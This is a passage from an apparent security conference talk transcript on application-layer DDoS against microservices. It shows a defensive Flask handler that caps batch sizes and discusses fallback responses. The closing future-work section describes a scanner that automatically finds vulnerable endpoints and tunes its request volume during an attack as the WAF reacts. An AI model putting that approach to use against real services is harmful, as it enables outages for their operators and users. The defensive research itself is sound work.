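    MAX_RANGE = 100

    @app.route("/recommendations", methods=["POST"])
    def recommendations():
        body = request.get_json(silent=True) or {}
        items = body.get("items", [])
        rng = body.get("range", {})
        span = rng.get("to", 0) - rng.get("from", 0)

        # Reject obviously abnormal batch sizes before any fan-out happens, so one
        # cheap edge request can't turn into thousands of middle tier RPCs.
        if len(items) > MAX_ITEMS or span > MAX_RANGE:
            return jsonify(error="batch size exceeds limit"), 413

        # ...normal, bounded fan-out to middle tier services would happen here...
        return jsonify(results=[])

    if __name__ == "__main__":
        app.run()

The same caps belong in the client libraries too, so well-behaved callers never even send an oversized request.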
And then finally, triggering a fallback experience. You can think of a fallback experience, once again, as: your service is super unhealthy, so you at least want to return some sort of generic experience to your customers, so they don't just get some XML 504 error when the service is really unhealthy.

So there's some future work, some areas I think we could explore a little more. Automated identification of potentially vulnerable endpoints: I alluded to this a little earlier. It's kind of a manual process for me at this point, but I imagine that with enough sampling, enough request sizing, and enough munging of the data, we could find a way to identify those latent calls automatically. Then there's auto-tuning during an attack. As you can imagine, when you're conducting a large-scale application DDoS attack, things are going to change while the attack is going on: the WAF's going to kick in, services are going to go up and down. Really, we should be able to set up success and error criteria in a tool and let the scanner automatically tune how much work, or how many requests, it sends while it's running the attack. And finally, I think there's a really interesting opportunity for testing common open source microservice frameworks, libraries, and gateways; I'd imagine there's more to be explored in this space.

And with that, I'll say thanks. We're gonna be hanging out in the chill room after the session, which is where registration was, and here are links to pull the source code. Thanks. [clapping]